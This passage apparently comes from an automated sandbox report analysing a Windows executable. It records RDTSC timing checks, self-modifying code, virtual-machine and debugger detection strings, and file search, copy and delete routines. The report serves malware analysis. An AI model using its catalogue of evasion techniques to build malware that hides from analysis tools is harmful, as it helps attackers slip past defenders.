                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3286E second address: A32874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A32874 second address: A3287A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3287A second address: A3288B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 jp 00007F7F147AEA46h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3288B second address: A32891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A32891 second address: A328A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007F7F147AEA4Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A32BF0 second address: A32BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A32FF8 second address: A32FFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A33177 second address: A3317D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3317D second address: A33183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A33183 second address: A33188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A332E8 second address: A332EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37D37 second address: A37D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F7F1511CE2Ah 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F7F1511CE2Fh 0x00000013 jc 00007F7F1511CE26h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E501 second address: A3E51E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA58h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E946 second address: A3E94B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A441AE second address: A441D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jng 00007F7F147AEA5Dh 0x0000000b jmp 00007F7F147AEA57h 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F7F147AEA46h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45A4A second address: A45A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45A4E second address: A45A7A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F7F147AEA4Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F7F147AEA58h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45A7A second address: A45A9D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 jmp 00007F7F1511CE2Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jns 00007F7F1511CE26h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45A9D second address: A45AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7F147AEA46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45AAC second address: A45AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A495A8 second address: A495BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7F147AEA4Eh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A495BE second address: A495C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A496DC second address: A496F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F7F147AEA46h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push esi 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4FEEB second address: A4FEF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57992 second address: A579B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA59h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A59DD2 second address: A59DE0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A59DE0 second address: A59DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9948E1 second address: 9948FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6F3A4 second address: A6F3E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F7F147AEA59h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7F147AEA4Eh 0x00000013 jmp 00007F7F147AEA50h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A723DE second address: A723E5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73A00 second address: A73A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73A0F second address: A73A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73A13 second address: A73A2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA51h 0x00000007 jc 00007F7F147AEA46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73A2E second address: A73A3C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7F1511CE28h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73A3C second address: A73A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B83C second address: A7B850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1511CE30h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7A393 second address: A7A397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7A397 second address: A7A3CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7F1511CE39h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7A3CC second address: A7A3E8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F147AEA4Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F7F147AEA46h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7A3E8 second address: A7A3EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7A3EC second address: A7A3F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 996482 second address: 996488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7F87F second address: A7F883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7F883 second address: A7F8A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F7F1511CE3Ah 0x0000000e jmp 00007F7F1511CE34h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7F8A5 second address: A7F8BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA50h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7FA82 second address: A7FAAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1511CE30h 0x00000009 popad 0x0000000a jmp 00007F7F1511CE33h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7FAAA second address: A7FAB4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7F147AEA4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9CC51 second address: A9CC64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1511CE2Eh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9E97A second address: A9E97E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9E97E second address: A9E984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAD717 second address: AAD721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F7F147AEA46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADE2D second address: AADE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7F1511CE26h 0x0000000a jl 00007F7F1511CE26h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADE3E second address: AADE48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F7F147AEA46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADE48 second address: AADE52 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7F1511CE26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAE10C second address: AAE112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAE242 second address: AAE24C instructions: 0x00000000 rdtsc 0x00000002 js 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB109A second address: AB10B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA51h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3CF0 second address: AB3CF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3CF5 second address: AB3D00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F7F147AEA46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3F4A second address: AB3F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3F4E second address: AB3F54 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3F54 second address: AB3FC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F7F1511CE35h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 call 00007F7F1511CE2Bh 0x00000015 jnp 00007F7F1511CE29h 0x0000001b adc dh, FFFFFF8Fh 0x0000001e pop edx 0x0000001f push dword ptr [ebp+122D2971h] 0x00000025 jnc 00007F7F1511CE36h 0x0000002b push 29A5B6F5h 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F7F1511CE37h 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3FC5 second address: AB3FCF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7F147AEA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3FCF second address: AB3FD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB7376 second address: AB737A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB737A second address: AB738C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F7F1511CE2Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5480239 second address: 5480248 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5480248 second address: 548024E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 548024E second address: 5480252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5480252 second address: 548028C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F7F1511CE2Ah 0x00000010 or ch, FFFFFFF8h 0x00000013 jmp 00007F7F1511CE2Bh 0x00000018 popfd 0x00000019 movzx ecx, di 0x0000001c popad 0x0000001d mov dword ptr [esp], ebp 0x00000020 pushad 0x00000021 movsx edi, si 0x00000024 mov dx, cx 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d mov edi, eax 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 548028C second address: 54802B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F7F147AEA4Ah 0x0000000c xor ecx, 25DF0888h 0x00000012 jmp 00007F7F147AEA4Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54802B6 second address: 54802BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 4364h 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5480346 second address: 548034C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 548034C second address: 5480351 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CFDC1 second address: 9CFDE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F7F147AEA46h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CFDE3 second address: 9CFDE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8219E4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9C686F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9ECA21 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_005D38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005D4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_005CDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_005CE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_005D4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_005CED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_005CBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005CDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005C16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005C16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005CF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_005D3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005C1160 GetSystemInfo,ExitProcess,0_2_005C1160
                Source: file.exe, file.exe, 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2215149403.00000000014D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`|P
                Source: file.exe, 00000000.00000002.2215149403.0000000001505000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13352
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13349
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13372
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13404
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13364
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005C45C0 VirtualProtect ?,00000004,00000100,000000000_2_005C45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_005D9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D9750 mov eax, dword ptr fs:[00000030h]0_2_005D9750
